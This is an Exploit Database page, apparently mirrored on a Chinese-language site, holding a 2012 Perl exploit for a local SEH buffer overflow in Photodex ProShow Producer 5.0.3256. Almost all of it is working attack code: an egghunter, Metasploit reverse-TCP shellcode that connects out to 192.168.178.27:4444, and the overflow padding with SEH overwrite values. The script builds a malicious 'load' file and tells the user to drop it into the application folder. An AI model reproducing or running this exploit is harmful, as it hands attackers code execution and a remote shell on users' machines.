Photodex ProShow Producer 5.0.3256 – Local Buffer Overflow

• Exploit Database
• 12 阅读

• 作者： mr.pr0n
  日期： 2012-07-23
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20036/

• #######################################################################################
  # Exploit Title: Photodex ProShow Producer v5.0.3256 - Local Buffer Overflow Exploit
  # Date: 22/07/2012
  # Author: mr.pr0n (@_pr0n_)
  # Homepage: http://ghostinthelab.wordpress.com/
  # Software Link: http://files.photodex.com/release/pspro_50_3256.exe
  # Version: v5.0.3256
  # Tested on: Windows XP SP3
  # +-----------------------------------------------------+
  # | This vulnerability was discovered and researched 	|
  # | by Julien Ahrens [from Inshell]			|
  # | http://www.exploit-db.com/exploits/19563/		|
  # +-----------------------------------------------------+
  ######################################################################################
  
  # The egghunter.
  $egghunter=
  "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
  "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
  "w00t". # <-- The 4 byte tag
  "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  
  # MSF windows/shell_reverse_tcp 
  # LHOST=192.168.178.27 LPORT=4444
  $shellcode =
  "\xb8\x78\x6f\x18\xec\xdb\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1".
  "\x4f\x31\x42\x14\x83\xea\xfc\x03\x42\x10\x9a\x9a\xe4\x04\xd3".
  "\x65\x15\xd5\x83\xec\xf0\xe4\x91\x8b\x71\x54\x25\xdf\xd4\x55".
  "\xce\x8d\xcc\xee\xa2\x19\xe2\x47\x08\x7c\xcd\x58\xbd\x40\x81".
  "\x9b\xdc\x3c\xd8\xcf\x3e\x7c\x13\x02\x3f\xb9\x4e\xed\x6d\x12".
  "\x04\x5c\x81\x17\x58\x5d\xa0\xf7\xd6\xdd\xda\x72\x28\xa9\x50".
  "\x7c\x79\x02\xef\x36\x61\x28\xb7\xe6\x90\xfd\xa4\xdb\xdb\x8a".
  "\x1e\xaf\xdd\x5a\x6f\x50\xec\xa2\x23\x6f\xc0\x2e\x3a\xb7\xe7".
  "\xd0\x49\xc3\x1b\x6c\x49\x10\x61\xaa\xdc\x85\xc1\x39\x46\x6e".
  "\xf3\xee\x10\xe5\xff\x5b\x57\xa1\xe3\x5a\xb4\xd9\x18\xd6\x3b".
  "\x0e\xa9\xac\x1f\x8a\xf1\x77\x3e\x8b\x5f\xd9\x3f\xcb\x38\x86".
  "\xe5\x87\xab\xd3\x9f\xc5\xa3\x10\xad\xf5\x33\x3f\xa6\x86\x01".
  "\xe0\x1c\x01\x2a\x69\xba\xd6\x4d\x40\x7a\x48\xb0\x6b\x7a\x40".
  "\x77\x3f\x2a\xfa\x5e\x40\xa1\xfa\x5f\x95\x65\xab\xcf\x46\xc5".
  "\x1b\xb0\x36\xad\x71\x3f\x68\xcd\x79\x95\x1f\xca\xee\xd6\x88".
  "\x66\xf5\xbe\xca\x86\x1b\x63\x42\x60\x71\x8b\x02\x3b\xee\x32".
  "\x0f\xb7\x8f\xbb\x85\x5f\x33\x29\x42\x9f\x3a\x52\xdd\xc8\x6b".
  "\xa4\x14\x9c\x81\x9f\x8e\x82\x5b\x79\xe8\x06\x80\xba\xf7\x87".
  "\x45\x86\xd3\x97\x93\x07\x58\xc3\x4b\x5e\x36\xbd\x2d\x08\xf8".
  "\x17\xe4\xe7\x52\xff\x71\xc4\x64\x79\x7e\x01\x13\x65\xcf\xfc".
  "\x62\x9a\xe0\x68\x63\xe3\x1c\x09\x8c\x3e\xa5\x39\xc7\x62\x8c".
  "\xd1\x8e\xf7\x8c\xbf\x30\x22\xd2\xb9\xb2\xc6\xab\x3d\xaa\xa3".
  "\xae\x7a\x6c\x58\xc3\x13\x19\x5e\x70\x13\x08";
  
  
  $file		= "load"; # The "load" file 
  $junk 		= "\x41" x (9844 - length("w00tw00t") - length($shellcode));
  $nseh 	= "\xEB\x06\x90\x90"; # short jump 6 bytes
  $seh		= "\x73\xb0\x22\x10"; # 0x1022b073 -p/p/r- [if.dnt]
  $nops		= "\x90" x (100 - length($egghunter));
  $exploit 	= $junk."w00tw00t".$shellcode.$nseh.$seh."\x90\x90\x90\x90".$egghunter.$nops;
  open($File,">$file");
  print $File $exploit;
  close($File);
  print " \n[!] The 'load' file, was created successfully (".(length $exploit)." bytes) [!]\n\n";
  print "[+] Place the arbitrary 'load' file, into the application directory.\n";
  print "[+] Execute the application (proshow.exe) \n";